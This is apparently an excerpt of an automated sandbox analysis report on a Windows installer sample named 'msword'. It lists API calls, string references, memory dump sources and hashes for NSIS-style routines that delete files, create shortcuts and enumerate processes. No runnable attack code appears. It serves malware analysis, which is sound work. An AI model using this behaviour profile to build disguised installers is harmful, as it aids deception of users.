• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msword.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CallbackDispatcherUser
• String ID:
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404993
• GetDlgItem.USER32(?,00000408), ref: 004049A0
• GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
• LoadBitmapW.USER32(0000006E), ref: 00404A02
• SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
• DeleteObject.GDI32(?), ref: 00404A79
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
• GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
• ShowWindow.USER32(?,00000005), ref: 00404BCF
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
• ImageList_Destroy.COMCTL32(?), ref: 00404D9C
• GlobalFree.KERNEL32(?), ref: 00404DAC
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
• SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
• ShowWindow.USER32(?,00000000), ref: 00404F49
• GetDlgItem.USER32(?,000003FE), ref: 00404F54
• ShowWindow.USER32(00000000), ref: 00404F5B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $ @$M$N
APIs
• GetDlgItem.USER32(?,000003F0), ref: 004044F9
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
• GetDlgItem.USER32(?,000003FB), ref: 00404527
• GetAsyncKeyState.USER32(00000010), ref: 0040452E
• GetDlgItem.USER32(?,000003F0), ref: 00404543
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
• SetWindowTextW.USER32(?,?), ref: 00404583
• SHBrowseForFolderW.SHELL32(?), ref: 0040463D
• lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
• lstrcatW.KERNEL32(?,00462540), ref: 00404686
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
• CoTaskMemFree.OLE32(00000000), ref: 00404648
  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
• GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
• String ID: 82D$@%F$@rD$A
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
• ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
• ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
• lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
• lstrcmpA.KERNEL32(name,?), ref: 00406FC7
• CloseHandle.KERNEL32(?), ref: 004071E6
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
• String ID: %s: failed opening file "%s"$GetTTFNameString$name
APIs
• DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
• lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
• lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
• lstrlenW.KERNEL32(?), ref: 00406D2C
• FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
• FindClose.KERNEL32(?), ref: 00406E33
Strings
• RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
• \*.*, xrefs: 00406D03
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
• Delete: DeleteFile failed("%s"), xrefs: 00406DFD
• Delete: DeleteFile("%s"), xrefs: 00406DBC
• RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
• RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
• Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
APIs
• GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
• lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
• lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
• String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 3581403547-784952888
                                                                            • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                            • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                            Strings
                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                            • API String ID: 542301482-1377821865
                                                                            • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                            • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                            • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                            • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                            • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                              • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                            • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                            • API String ID: 20674999-2124804629
                                                                            • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                            • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                            • GetSysColor.USER32(?), ref: 004041AF
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                            • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                              • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                            • SendMessageW.USER32(00000000), ref: 00404251
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                            • SetCursor.USER32(00000000), ref: 004042D2
                                                                            • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                            • SetCursor.USER32(00000000), ref: 004042F6
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                            • String ID: @%F$N$open
                                                                            • API String ID: 3928313111-3849437375
                                                                            • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                            • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                            • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                            • wsprintfA.USER32 ref: 00406B4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                            • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                            • String ID: F$%s=%s$NUL$[Rename]
                                                                            • API String ID: 565278875-1653569448
                                                                            • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                            • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                            • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
